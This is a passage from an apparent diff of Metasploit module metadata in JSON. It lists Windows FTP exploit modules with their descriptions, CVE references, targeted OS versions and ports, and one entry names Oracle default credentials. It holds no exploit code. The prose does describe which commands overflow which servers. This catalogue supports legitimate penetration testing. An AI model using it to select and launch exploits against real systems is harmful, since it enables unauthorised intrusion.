By\n default, this option is unchecked.", + "references": [ + "CVE-2006-6576", + "OSVDB-35951", + "BID-45957", + "EDB-16036" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Automatic", + "Windows XP Pro SP3", + "Windows XP Pro SP2", + "Windows XP Pro SP0/SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/goldenftp_pass_bof.rb", + "is_install_path": true, + "ref_name": "windows/ftp/goldenftp_pass_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/httpdx_tolog_format": { + "name": "HTTPDX tolog() Function Format String Vulnerability", + "fullname": "exploit/windows/ftp/httpdx_tolog_format", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-11-17", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a format string vulnerability in HTTPDX FTP server.\n By sending a specially crafted FTP command containing format specifiers, an\n attacker can corrupt memory and execute arbitrary code.\n\n By default logging is off for HTTP, but enabled for the 'moderator' user\n via FTP.", + "references": [ + "CVE-2009-4769", + "OSVDB-60181" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Automatic Targeting", + "httpdx 1.4 - Windows XP SP3 English", + "httpdx 1.4.5 - Windows XP SP3 English", + "httpdx 1.4.6 - Windows XP SP3 English", + "httpdx 1.4.6b - Windows XP SP3 English", + "httpdx 1.5 - Windows XP SP3 English" + ], + "mod_time": "2022-08-08 01:40:15 +0000", + "path": "/modules/exploits/windows/ftp/httpdx_tolog_format.rb", + "is_install_path": true, + "ref_name": "windows/ftp/httpdx_tolog_format", + "check": true, + "post_auth": true, + "default_credential": 
false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/kmftp_utility_cwd": { + "name": "Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow", + "fullname": "exploit/windows/ftp/kmftp_utility_cwd", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-08-23", + "type": "exploit", + "author": [ + "Shankar Damodaran", + "Muhamad Fadzil Ramli " + ], + "description": "This module exploits an SEH overflow in Konica Minolta FTP Server 1.00.\n Konica Minolta FTP fails to check input size when parsing 'CWD' commands, which\n leads to an SEH overflow. Konica FTP allows anonymous access by default; valid\n credentials are typically unnecessary to exploit this vulnerability.", + "references": [ + "CVE-2015-7768", + "EDB-37908" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Windows 7 SP1 x86" + ], + "mod_time": "2023-03-22 12:52:15 +0000", + "path": "/modules/exploits/windows/ftp/kmftp_utility_cwd.rb", + "is_install_path": true, + "ref_name": "windows/ftp/kmftp_utility_cwd", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/labf_nfsaxe": { + "name": "LabF nfsAxe 3.7 FTP Client Stack Buffer Overflow", + "fullname": "exploit/windows/ftp/labf_nfsaxe", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-05-15", + "type": "exploit", + "author": [ + "Tulpa", + "Daniel Teixeira" + ], + "description": "This module exploits a buffer overflow in the LabF nfsAxe 3.7 FTP Client allowing remote\n code execution.", + "references": [ + "CVE-2017-18047", + "EDB-42011" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": 
"2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/labf_nfsaxe.rb", + "is_install_path": true, + "ref_name": "windows/ftp/labf_nfsaxe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/leapftp_list_reply": { + "name": "LeapFTP 3.0.1 Stack Buffer Overflow", + "fullname": "exploit/windows/ftp/leapftp_list_reply", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-10-12", + "type": "exploit", + "author": [ + "corelanc0d3r ", + "nullthreat" + ], + "description": "This module exploits a buffer overflow in the LeapFTP 3.0.1 client.\n This issue is triggered when a file with a long name is downloaded/opened.", + "references": [ + "OSVDB-68640", + "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/leapftp_list_reply.rb", + "is_install_path": true, + "ref_name": "windows/ftp/leapftp_list_reply", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/leapftp_pasv_reply": { + "name": "LeapWare LeapFTP v2.7.3.600 PASV Reply Client Overflow", + "fullname": "exploit/windows/ftp/leapftp_pasv_reply", + "aliases": [], + "rank": 300, + "disclosure_date": "2003-06-09", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits a buffer overflow in the LeapWare LeapFTP v2.7.3.600\n client that is triggered through an excessively long PASV reply command. 
This\n module was ported from the original exploit by drG4njubas with minor improvements.", + "references": [ + "CVE-2003-0558", + "OSVDB-4587", + "BID-7860", + "EDB-54" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Universal LeapFTP.exe", + "Windows 2000 SP0/4 English", + "Windows XP SP0 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/leapftp_pasv_reply.rb", + "is_install_path": true, + "ref_name": "windows/ftp/leapftp_pasv_reply", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/ms09_053_ftpd_nlst": { + "name": "MS09-053 Microsoft IIS FTP Server NLST Response Overflow", + "fullname": "exploit/windows/ftp/ms09_053_ftpd_nlst", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-08-31", + "type": "exploit", + "author": [ + "Kingcope ", + "hdm " + ], + "description": "This module exploits a stack buffer overflow flaw in the Microsoft IIS FTP\n service. The flaw is triggered when a special NLST argument is passed\n while the session has changed into a long directory path. 
For this exploit\n to work, the FTP server must be configured to allow write access to the\n file system (either anonymously or in conjunction with a real account)", + "references": [ + "EDB-9541", + "CVE-2009-3023", + "OSVDB-57589", + "BID-36189", + "MSB-MS09-053" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Windows 2000 SP4 English/Italian (IIS 5.0)", + "Windows 2000 SP3 English (IIS 5.0)", + "Windows 2000 SP0-SP3 Japanese (IIS 5.0)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb", + "is_install_path": true, + "ref_name": "windows/ftp/ms09_053_ftpd_nlst", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/netterm_netftpd_user": { + "name": "NetTerm NetFTPD USER Buffer Overflow", + "fullname": "exploit/windows/ftp/netterm_netftpd_user", + "aliases": [], + "rank": 500, + "disclosure_date": "2005-04-26", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This module exploits a vulnerability in the NetTerm NetFTPD\n application. 
This package is part of the NetTerm package.\n This module uses the USER command to trigger the overflow.", + "references": [ + "CVE-2005-1323", + "OSVDB-15865", + "URL-https://seclists.org/lists/fulldisclosure/2005/Apr/0578.html", + "BID-13396" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "NetTerm NetFTPD Universal", + "Windows 2000 English", + "Windows XP English SP0/SP1", + "Windows 2003 English", + "Windows NT 4.0 SP4/SP5/SP6" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/netterm_netftpd_user.rb", + "is_install_path": true, + "ref_name": "windows/ftp/netterm_netftpd_user", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/odin_list_reply": { + "name": "Odin Secure FTP 4.1 Stack Buffer Overflow (LIST)", + "fullname": "exploit/windows/ftp/odin_list_reply", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-10-12", + "type": "exploit", + "author": [ + "rick2600", + "corelanc0d3r " + ], + "description": "This module exploits a stack buffer overflow in Odin Secure FTP 4.1,\n triggered when processing the response on a LIST command. 
During the overflow,\n a structured exception handler record gets overwritten.", + "references": [ + "OSVDB-68824", + "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "XP SP3 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/odin_list_reply.rb", + "is_install_path": true, + "ref_name": "windows/ftp/odin_list_reply", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/open_ftpd_wbem": { + "name": "Open-FTPD 1.2 Arbitrary File Upload", + "fullname": "exploit/windows/ftp/open_ftpd_wbem", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-06-18", + "type": "exploit", + "author": [ + "Serge Gorbunov", + "bcoles " + ], + "description": "This module exploits multiple vulnerabilities found in Open&Compact FTP\n server. 
The software contains an authentication bypass vulnerability and a\n arbitrary file upload vulnerability that allows a remote attacker to write\n arbitrary files to the file system as long as there is at least one user\n who has permission.\n\n Code execution can be achieved by first uploading the payload to the remote\n machine as an exe file, and then upload another mof file, which enables\n WMI (Management Instrumentation service) to execute the uploaded payload.\n Please note that this module currently only works for Windows before Vista.", + "references": [ + "OSVDB-65687", + "EDB-13932", + "CVE-2010-2620" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Open&Compact FTP 1.2 on Windows (Before Vista)" + ], + "mod_time": "2021-02-18 09:18:19 +0000", + "path": "/modules/exploits/windows/ftp/open_ftpd_wbem.rb", + "is_install_path": true, + "ref_name": "windows/ftp/open_ftpd_wbem", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/ftp/oracle9i_xdb_ftp_pass": { + "name": "Oracle 9i XDB FTP PASS Overflow (win32)", + "fullname": "exploit/windows/ftp/oracle9i_xdb_ftp_pass", + "aliases": [], + "rank": 500, + "disclosure_date": "2003-08-18", + "type": "exploit", + "author": [ + "MC " + ], + "description": "By passing an overly long string to the PASS command, a\n stack based buffer overflow occurs. 
David Litchfield, has\n illustrated multiple vulnerabilities in the Oracle 9i XML\n Database (XDB), during a seminar on \"Variations in exploit\n methods between Linux and Windows\" presented at the Blackhat\n conference.", + "references": [ + "CVE-2003-0727", + "OSVDB-2449", + "BID-8375", + "URL-http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf" + ], + "platform": "Windows", + "arch": "", + "rport": 2100, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Oracle 9.2.0.1 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb", + "is_install_path": true, + "ref_name": "windows/ftp/oracle9i_xdb_ftp_pass", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/oracle9i_xdb_ftp_unlock": { + "name": "Oracle 9i XDB FTP UNLOCK Overflow (win32)", + "fullname": "exploit/windows/ftp/oracle9i_xdb_ftp_unlock", + "aliases": [], + "rank": 500, + "disclosure_date": "2003-08-18", + "type": "exploit", + "author": [ + "MC ", + "David Litchfield " + ], + "description": "By passing an overly long token to the UNLOCK command, a\n stack based buffer overflow occurs. David Litchfield, has\n illustrated multiple vulnerabilities in the Oracle 9i XML\n Database (XDB), during a seminar on \"Variations in exploit\n methods between Linux and Windows\" presented at the Blackhat\n conference. 
Oracle9i includes a number of default accounts,\n including dbsnmp:dbsmp, scott:tiger, system:manager, and\n sys:change_on_install.", + "references": [ + "CVE-2003-0727", + "OSVDB-2449", + "BID-8375", + "URL-http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf" + ], + "platform": "Windows", + "arch": "", + "rport": 2100, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Oracle 9.2.0.1 Universal" + ], + "mod_time": "2022-08-08 01:40:15 +0000", + "path": "/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb", + "is_install_path": true, + "ref_name": "windows/ftp/oracle9i_xdb_ftp_unlock", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/pcman_put": { + "name": "PCMAN FTP Server Buffer Overflow - PUT Command", + "fullname": "exploit/windows/ftp/pcman_put", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-08-07", + "type": "exploit", + "author": [ + "Jay Turla", + "Chris Higgins" + ], + "description": "This module exploits a buffer overflow vulnerability found in the PUT command of the\n PCMAN FTP v2.0.7 Server. 
This requires authentication but by default anonymous\n credentials are enabled.", + "references": [ + "CVE-2013-4730", + "EDB-37731", + "OSVDB-94624" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Windows XP SP3 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/pcman_put.rb", + "is_install_path": true, + "ref_name": "windows/ftp/pcman_put", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/pcman_stor": { + "name": "PCMAN FTP Server Post-Authentication STOR Command Stack Buffer Overflow", + "fullname": "exploit/windows/ftp/pcman_stor", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-06-27", + "type": "exploit", + "author": [ + "Christian (Polunchis) Ramirez", + "Rick (nanotechz9l) Flores" + ], + "description": "This module exploits a buffer overflow vulnerability found in the STOR command of the\n PCMAN FTP v2.07 Server when the \"/../\" parameters are also sent to the server. Please\n note authentication is required in order to trigger the vulnerability. 
The overflowing\n string will also be seen on the FTP server log console.", + "references": [ + "CVE-2013-4730", + "OSVDB-94624", + "EDB-27703" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Windows XP SP3 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/pcman_stor.rb", + "is_install_path": true, + "ref_name": "windows/ftp/pcman_stor", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/proftp_banner": { + "name": "ProFTP 2.9 Banner Remote Buffer Overflow", + "fullname": "exploit/windows/ftp/proftp_banner", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-08-25", + "type": "exploit", + "author": [ + "His0k4 " + ], + "description": "This module exploits a buffer overflow in the ProFTP 2.9\n client that is triggered through an excessively long welcome message.", + "references": [ + "CVE-2009-3976", + "OSVDB-57394", + "URL-http://www.labtam-inc.com/index.php?act=products&pid=1" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/proftp_banner.rb", + "is_install_path": true, + "ref_name": "windows/ftp/proftp_banner", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/quickshare_traversal_write": { + "name": "QuickShare File Server 1.2.1 Directory Traversal Vulnerability", + "fullname": "exploit/windows/ftp/quickshare_traversal_write", + "aliases": [], + "rank": 600, + "disclosure_date": "2011-02-03", + "type": "exploit", + "author": [ + "modpr0be", + "sinn3r " + ], + "description": "This module exploits 
a vulnerability found in QuickShare File Server's FTP\n service. By supplying \"../\" in the file path, it is possible to trigger a\n directory traversal flaw, allowing the attacker to read a file outside the\n virtual directory. By default, the \"Writable\" option is enabled during account\n creation, therefore this makes it possible to create a file at an arbitrary\n location, which leads to remote code execution.", + "references": [ + "OSVDB-70776", + "EDB-16105", + "URL-http://www.quicksharehq.com/blog/quickshare-file-server-1-2-2-released.html", + "URL-http://www.digital-echidna.org/2011/02/quickshare-file-share-1-2-1-directory-traversal-vulnerability/" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "QuickShare File Server 1.2.1" + ], + "mod_time": "2021-02-18 09:18:19 +0000", + "path": "/modules/exploits/windows/ftp/quickshare_traversal_write.rb", + "is_install_path": true, + "ref_name": "windows/ftp/quickshare_traversal_write", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/ricoh_dl_bof": { + "name": "Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow", + "fullname": "exploit/windows/ftp/ricoh_dl_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-03-01", + "type": "exploit", + "author": [ + "Julien Ahrens", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in Ricoh DC's DL-10 SR10 FTP\n service. 
By supplying a long string of data to the USER command, it is\n possible to trigger a stack-based buffer overflow, which allows remote code\n execution under the context of the user.\n\n Please note that in order to trigger the vulnerability, the server must\n be configured with a log file name (by default, it's disabled).", + "references": [ + "CVE-2012-5002", + "OSVDB-79691", + "URL-http://web.archive.org/web/20120514112629/http://secunia.com/advisories/47912/", + "URL-http://www.inshell.net/2012/03/ricoh-dc-software-dl-10-ftp-server-sr10-exe-remote-buffer-overflow-vulnerability/" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Windows XP SP3" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/ftp/ricoh_dl_bof.rb", + "is_install_path": true, + "ref_name": "windows/ftp/ricoh_dl_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/sami_ftpd_list": { + "name": "Sami FTP Server LIST Command Buffer Overflow", + "fullname": "exploit/windows/ftp/sami_ftpd_list", + "aliases": [], + "rank": 100, + "disclosure_date": "2013-02-27", + "type": "exploit", + "author": [ + "superkojiman", + "Doug Prostko " + ], + "description": "This module exploits a stack based buffer overflow on Sami FTP Server 2.0.1.\n The vulnerability exists in the processing of LIST commands. In order to trigger\n the vulnerability, the \"Log\" tab must be viewed in the Sami FTP Server managing\n application, in the target machine. On the other hand, the source IP address used\n to connect with the FTP Server is needed. If the user can't provide it, the module\n will try to resolve it. 
This module has been tested successfully on Sami FTP Server\n 2.0.1 over Windows XP SP3.", + "references": [ + "OSVDB-90815", + "BID-58247", + "EDB-24557" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Sami FTP Server 2.0.1 / Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/sami_ftpd_list.rb", + "is_install_path": true, + "ref_name": "windows/ftp/sami_ftpd_list", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/sami_ftpd_user": { + "name": "KarjaSoft Sami FTP Server v2.0.2 USER Overflow", + "fullname": "exploit/windows/ftp/sami_ftpd_user", + "aliases": [], + "rank": 300, + "disclosure_date": "2006-01-24", + "type": "exploit", + "author": [ + "Muhammad Ahmed Siddiqui", + "Critical Security", + "n30m1nd", + "aushack ", + "bcoles " + ], + "description": "This module exploits an unauthenticated stack buffer overflow in\n KarjaSoft Sami FTP Server version 2.0.2 by sending an overly long\n USER string during login.\n\n The payload is triggered when the administrator opens the application\n GUI. If the GUI window is open at the time of exploitation, the\n payload will be executed immediately. Keep this in mind when selecting\n payloads. 
The application will crash following execution of the\n payload and will not restart automatically.\n\n When the application is restarted, it will re-execute the payload\n unless the payload has been manually removed from the SamiFTP.binlog\n log file.\n\n This module has been tested successfully on Sami FTP Server versions:\n 2.0.2 on Windows XP SP0 (x86);\n 2.0.2 on Windows 7 SP1 (x86);\n 2.0.2 on Windows 7 SP1 (x64); and\n 2.0.2 on Windows 10 (1909) (x64).", + "references": [ + "CVE-2006-0441", + "CVE-2006-2212", + "OSVDB-25670", + "BID-16370", + "BID-22045", + "BID-17835", + "EDB-1448", + "EDB-1452", + "EDB-1462", + "EDB-3127", + "EDB-3140", + "EDB-40675" + ], + "platform": "Windows", + "arch": "x86", + "rport": 21, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Sami FTP Server version 2.0.2" + ], + "mod_time": "2021-02-25 20:53:30 +0000", + "path": "/modules/exploits/windows/ftp/sami_ftpd_user.rb", + "is_install_path": true, + "ref_name": "windows/ftp/sami_ftpd_user", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/sasser_ftpd_port": { + "name": "Sasser Worm avserve FTP PORT Buffer Overflow", + "fullname": "exploit/windows/ftp/sasser_ftpd_port", + "aliases": [], + "rank": 200, + "disclosure_date": "2004-05-10", + "type": "exploit", + "author": [ + "valsmith ", + "chamuco ", + "aushack " + ], + "description": "This module exploits the FTP server component of the Sasser worm.\n By sending an overly long PORT command the stack can be overwritten.", + "references": [ + "OSVDB-6197" + ], + "platform": "Windows", + "arch": "x86", + "rport": 5554, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Windows XP SP0", + "Windows XP SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": 
"/modules/exploits/windows/ftp/sasser_ftpd_port.rb", + "is_install_path": true, + "ref_name": "windows/ftp/sasser_ftpd_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/scriptftp_list": { + "name": "ScriptFTP LIST Remote Buffer Overflow", + "fullname": "exploit/windows/ftp/scriptftp_list", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-10-12", + "type": "exploit", + "author": [ + "modpr0be", + "TecR0c ", + "mr_me " + ], + "description": "AmmSoft's ScriptFTP client is susceptible to a remote buffer overflow\n vulnerability that is triggered when processing a sufficiently long\n filename during a FTP LIST command resulting in overwriting the\n exception handler. Social engineering of executing a specially crafted\n ftp file by double click will result in connecting to our malicious\n server and perform arbitrary code execution which allows the attacker to\n gain the same rights as the user running ScriptFTP. 
This vulnerability\n affects versions 3.3 and earlier.", + "references": [ + "CVE-2011-3976", + "OSVDB-75633", + "EDB-17876", + "US-CERT-VU-440219" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 / Windows Vista" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/scriptftp_list.rb", + "is_install_path": true, + "ref_name": "windows/ftp/scriptftp_list", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/seagull_list_reply": { + "name": "Seagull FTP v3.3 Build 409 Stack Buffer Overflow", + "fullname": "exploit/windows/ftp/seagull_list_reply", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-10-12", + "type": "exploit", + "author": [ + "corelanc0d3r " + ], + "description": "This module exploits a buffer overflow in the Seagull FTP client that gets\n triggered when the ftp client processes a response to a LIST command. 
If the\n response contains an overly long file/folder name, a buffer overflow occurs,\n overwriting a structured exception handler.", + "references": [ + "OSVDB-94556", + "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "XP Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/seagull_list_reply.rb", + "is_install_path": true, + "ref_name": "windows/ftp/seagull_list_reply", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/servu_chmod": { + "name": "Serv-U FTP Server Buffer Overflow", + "fullname": "exploit/windows/ftp/servu_chmod", + "aliases": [], + "rank": 300, + "disclosure_date": "2004-12-31", + "type": "exploit", + "author": [ + "theLightCosine " + ], + "description": "This module exploits a stack buffer overflow in the site chmod command\n in versions of Serv-U FTP Server prior to 4.2.\n\n You must have valid credentials to trigger this vulnerability. 
Exploitation\n also leaves the service in a non-functional state.", + "references": [ + "CVE-2004-2111", + "OSVDB-3713", + "BID-9483" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Windows 2000 SP0-4 EN", + "Windows XP SP0-1 EN" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/servu_chmod.rb", + "is_install_path": true, + "ref_name": "windows/ftp/servu_chmod", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/servu_mdtm": { + "name": "Serv-U FTPD MDTM Overflow", + "fullname": "exploit/windows/ftp/servu_mdtm", + "aliases": [], + "rank": 400, + "disclosure_date": "2004-02-26", + "type": "exploit", + "author": [ + "spoonm " + ], + "description": "This is an exploit for the Serv-U\\'s MDTM command timezone\n overflow. It has been heavily tested against versions\n 4.0.0.4/4.1.0.0/4.1.0.3/5.0.0.0 with success against\n nt4/2k/xp/2k3. I have also had success against version 3,\n but only tested 1 version/os. The bug is in all versions\n prior to 5.0.0.4, but this exploit will not work against\n versions not listed above. 
You only get one shot, but it\n should be OS/SP independent.\n\n This exploit is a single hit, the service dies after the\n shellcode finishes execution.", + "references": [ + "CVE-2004-0330", + "OSVDB-4073", + "URL-http://archives.neohapsis.com/archives/bugtraq/2004-02/0654.html", + "BID-9751" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Serv-U Uber-Leet Universal ServUDaemon.exe", + "Serv-U 4.0.0.4/4.1.0.0/4.1.0.3 ServUDaemon.exe", + "Serv-U 5.0.0.0 ServUDaemon.exe" + ], + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/exploits/windows/ftp/servu_mdtm.rb", + "is_install_path": true, + "ref_name": "windows/ftp/servu_mdtm", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/slimftpd_list_concat": { + "name": "SlimFTPd LIST Concatenation Overflow", + "fullname": "exploit/windows/ftp/slimftpd_list_concat", + "aliases": [], + "rank": 500, + "disclosure_date": "2005-07-21", + "type": "exploit", + "author": [ + "Fairuzan Roslan " + ], + "description": "This module exploits a stack buffer overflow in the SlimFTPd\n server. The flaw is triggered when a LIST command is\n received with an overly-long argument. 
This vulnerability\n affects all versions of SlimFTPd prior to 3.16 and was\n discovered by Raphael Rigo.", + "references": [ + "CVE-2005-2373", + "OSVDB-18172", + "BID-14339" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "SlimFTPd Server <= 3.16 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/slimftpd_list_concat.rb", + "is_install_path": true, + "ref_name": "windows/ftp/slimftpd_list_concat", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/trellian_client_pasv": { + "name": "Trellian FTP Client 3.01 PASV Remote Buffer Overflow", + "fullname": "exploit/windows/ftp/trellian_client_pasv", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-04-11", + "type": "exploit", + "author": [ + "zombiefx", + "dookie" + ], + "description": "This module exploits a buffer overflow in the Trellian 3.01 FTP client that is triggered\n through an excessively long PASV message.", + "references": [ + "CVE-2010-1465", + "OSVDB-63812", + "EDB-12152" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/trellian_client_pasv.rb", + "is_install_path": true, + "ref_name": 